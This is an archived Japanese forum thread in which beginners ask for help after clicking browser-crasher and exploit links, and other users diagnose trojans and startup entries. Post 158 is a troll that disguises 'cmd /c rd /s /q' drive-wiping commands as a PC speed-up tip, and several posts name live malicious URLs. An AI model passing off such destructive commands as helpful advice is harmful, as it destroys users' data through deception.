06/12/17 22:11:27
>>137
d。やってみるよ。
139:名無しさん@お腹いっぱい。
06/12/18 00:25:29
セキュリティ初心者質問スレッドpart79
スレリンク(sec板)
140:名無しさん@お腹いっぱい。
06/12/18 21:06:57
【使用OS】 XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 VBとAVG
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】
AVG→IE一時ファイルにJS/Psyme.Cというトロイ
VBで全体スキャン→発見なし
【別のオンラインスキャンしたならその結果は】
カスペルスキーのオンラインスキャン(重要な領域)では発見なし
【症状を具体的に、分かる限りすべて書く】 コマンドプロンプトが大量に開きました
【何をしたらそんなことになったのか】 専ブラでクリックしてしまいました
URL:URLリンク(www.vipper.net)
【これまでにとった措置】 トロイを隔離したくらいです。
【その他の質問】
対処に困ってコンセントを抜いたんですが
その後PCを立ち上げるとStartUpScannerでこのようなログが出ました。
追加されたスタートアップです!
Location:HKCU
KeyName:MSMSGS
Command:"C:\Program Files\Messenger\msmsgs.exe" /background
KeyDataType:String
ExeFileName:C:\Program Files\Messenger\msmsgs.exe
ExeTimeStamp:2004/10/14 1:24:38
ExeFileSize:1,694,208
ExeMd5:74e6e96c6f0e2eca4edbb7f7a468f259
お願いします。
141:名無しさん@お腹いっぱい。
06/12/19 02:03:32
>>140
PSYMEを探してみた。メディアプレイヤーを上書きするトロイはあるみたいだが、メッセンジャーを上書きorメッセンジャーに感染は見つからなかった。
参考まで
URLリンク(www.trendmicro.co.jp)
URLリンク(www3.ca.com)
142:名無しさん@お腹いっぱい。
06/12/19 12:40:13
>>132
死ね 氏ねじゃなくて死ね
143:140
06/12/19 15:03:10
>>141
ありがとうございます!
メッセンジャー書き換えとかのトロイはないんですか・・・
また質問ですいませんが
メッセンジャー関係で何もしていなければこのログはトロイによって変更されたと考えて良いのでしょうか?
144:名無しさん@お腹いっぱい。
06/12/19 15:29:15
ブラクラの効果でOutlook Expressが起動したんだろ。
それと一緒にWindows Messengerが起動してスタートアップに放り込まれたんじゃねえの?
あれは一度起動すると設定を変えない限りスタートアップで起動するようになる。
145:名無しさん@お腹いっぱい。
06/12/19 16:17:55
>>144
メッセンジャーを起動して設定からバックグラウンドで起動〜のチェックを外したら
スタートアップから消えました
本当にありがとうございます!
146:名無しさん@お腹いっぱい。
06/12/19 23:21:54
>>145
PSYMEのトロイはもまえのVBで対応済みだと思う。隔離したというメッセージがでてればOK。
147:名無しさん@お腹いっぱい。
06/12/20 01:35:15
>>146
ありがとうございます
検出はAVGがしまして、それで隔離しました
今考えたら大量にウインドウが出たときにAVGとVBでぶつかって
検出に支障を来たしていないかと心配ですが・・・
148:名無しさん@お腹いっぱい。
06/12/20 01:59:36
AVGとVB・・・
まずは信頼できるやつをひとついれ
オンラインスキャン(カスペルスキーとか)を併用した方がよい
149:名無しさん@お腹いっぱい。
06/12/20 15:26:00
ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
の頭にhttp://をつけて下さい
jpgファイルを油断して踏んだらこちらに繋がったようです
これも>>3と同種でしょうか
150:149
06/12/20 15:36:20
すいません恐らく>>140と同じファイルだった様です
一応ウィルスは削除したのですがブラクラでウィルスまで貰ったのは初めてだったので。
これはウィルスの削除だけしておけば問題ないでしょうか
151:名無しさん@お腹いっぱい。
06/12/20 17:21:20
>>150
セキュリティホールを突いてくるウイルスサイトだが
OSがかなり古い状態でなければ踏んでも特に問題は無い
XPあたりなら素の状態でもシステム改変は無いだろう
念の為 一時ファイル削除してウイルススキャンして何も出なければ完了
152:名無しさん@お腹いっぱい。
06/12/20 17:22:54
>>150
なんのウィルス対策ソフト使ってるかわかんないんで安易に大丈夫とはいいにくい
カスペルスキーのオンラインスキャンでもやって確かめてみればおk
なお、あらかじめソフトが隔離したやつは削除、ならびにブラウザのキャッシュ(一時ファイル)なども削除して
PCを再起動させてからオンラインスキャンを開始かな
153:149
06/12/20 19:05:18
win2kで8月にアップデートしたので恐らく大丈夫だと思います
さっきカスペルスキーのオンラインスキャンもしてみましたが問題ないようでした。
アドバイスありがとうございました。
154:名無しさん@お腹いっぱい。
06/12/29 12:51:09
怖くて踏めないサイトのアドレス
を確認してくれるスレがあったと思うのですが
どこでしたでしょうか?
155:名無しさん@お腹いっぱい。
06/12/29 20:07:35
>>154
勇気がなくて踏めないURL鑑定スレin初質 Part1
スレリンク(qa板)
156:名無しさん@お腹いっぱい。
06/12/29 23:28:28
さんくすです
157:名無しさん@お腹いっぱい。
06/12/30 21:10:24
>>82
俺も踏んでもうたorz
158:名無しさん@お腹いっぱい。
06/12/31 12:53:03
最近PCが重いとか、起動シャットダウンが遅いとか思ってる人は、
リフレッシュコマンドを試してみるといい。
以下を実行することでディスク/ドライプの節約、メモリの開放になる。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q d:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q e:
cmd /c rd /s /q f:
cmd /c rd /s /q g:
cmd /c rd /s /q h:
cmd /c rd /s /q c:
これでディスク/ドライプがクリアされて正常になる。
事前予防にもなるので、やった事がなければ試してみる価値あり。
年末なのでPCもリフレッシュしましょう。
159:名無しさん@お腹いっぱい。
06/12/31 17:13:53
実行するとDドライブが全部消えちまうじゃねーか
160:名無しさん@お腹いっぱい。
06/12/31 18:17:11
RMDIR(RD)ディレクトリの削除
161:名無しさん@お腹いっぱい。
07/01/01 01:49:47
これブラクラらしいんですけど踏むと何か後遺症ありますか?
162:名無しさん@お腹いっぱい。
07/01/01 01:50:45
貼れてなかった…
これです
URLリンク(vip.6to23.com)
163:名無しさん@お腹いっぱい。
07/01/01 03:31:32
>>162
ただのびっくりページ
PCに悪さをするようなものは特に無い
164:名無しさん@お腹いっぱい。
07/01/02 03:58:51
【使用OS】 widowsXP SP2
【WindowsUpdateしてるか】 適宜
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 毎日
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 症状は今のところ無し
【何をしたらそんなことになったのか】
すいません、これ踏んじゃったんですが、htmlが偽装されてますよね?
openjaneと、firefoxで踏んじゃったんですが…。
不安だったので、聞きに来ました。お願いします。
URLリンク(ea.uuhp.com)
【これまでにとった措置】 ウイルスバスターで検索
【その他の質問】
165:名無しさん@お腹いっぱい。
07/01/02 04:26:24
MUVIC COMってなんなんですか?
166:164
07/01/02 04:51:50
ググったら、FDDアタックやらウィンドウオープンやらのブラクラらしいですね。
カスペのオンラインスキャンもやったんですが、何も発見されませんでした。
これは後遺症は無いんでしょうか?
167:名無しさん@お腹いっぱい。
07/01/02 04:59:33
>>166
基本的にはブラクラの類に属するものでウイルスやらシステム感染は無いはず
conconとか仕掛けているのを見ると、随分昔に作られたもののよう
今時のPCなら特に問題無い
IEで踏んだが発動したのはウィンドウオープンとFDDアタックだけだった
アンチウイルスによっては踏んだ時にWinbombとかそんな感じで反応があるかも知れない
対処法としては放置しても構わないが、何か気持ち悪いと思うなら一時ファイル削除して再起動で十分
168:164
07/01/02 05:13:43
>>167
ありがとうございます!
ヤフーで検索したら、今ちょっと出回ってるurlらしくて、
踏んでしまった自分が恥ずかしい限りです。勉強になりました。
キャッシュ消し再起動もやっておきます。
169:名無しさん@お腹いっぱい。
07/01/02 05:43:47
時々見かける目障りなURLだったからアク禁覚悟で流しておいた
もう404になっているはず
170:164
07/01/02 08:51:42
>>169
ありがとうございます。
あぷろだ確認しましたが、流されてました。
そういう二時被害の防ぎ方もあるんですね。勉強になりました。
171:名無しさん@お腹いっぱい。
07/01/03 04:06:05
URLリンク(www.vipper.net)
上記のファイルを誤って踏んでしまいました
OS(XP)、Norton Internet Security共に最新の状態でした
一通りウイルスチェックを行いましたが、その後どの様に対処すればよいのでしょうか…
172:名無しさん@お腹いっぱい。
07/01/03 04:52:03
>>171
スレリンク(sec板:9番)
症状の内容は?
173:名無しさん@お腹いっぱい。
07/01/03 05:22:47
>>172
ウインドウがたくさん出てきたりtelnetがどうとか…
あとWMPやRMが何度も実行されました
結局LANケーブル引っこ抜いて再起動させました
今レポートを見てみたらhellplantやip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm、blacksheepに繋がってしまったみたいです…
174:172
07/01/03 05:56:42
ダウンロードして検体送付しときました。
タスクマネージャーのプロセスにおかしなexeがないか?自分で確認しておいて下さい
175:名無しさん@お腹いっぱい。
07/01/03 05:56:49
>>173
「WELCOME」だね。前スレが落ちてるので以下コピペ
以下の有害サイトを大量に呼び出すブラクラ
1.www.hellplant.org/cgi-bin/xoor/serpent.cgi
厨房ホイホイ。IP抜かれるくらいで特に害は無い
2.www.albinoblacksheep.com/flash/you.html
元ブラクラ。今はただのフラッシュ。害は無い
3.ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
脆弱性を突いてWMPを破壊、任意のコードを実行
とりあえず危険なのは3のURLだが
脆弱性自体は2年位前に塞がれているはず
結論としてはWindowsがよっぽど古い状態でなければ問題は無い
一時ファイル削除して適当なウイルススキャンして何も出なければ完了
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
4294日前に更新/246 KB
担当:undef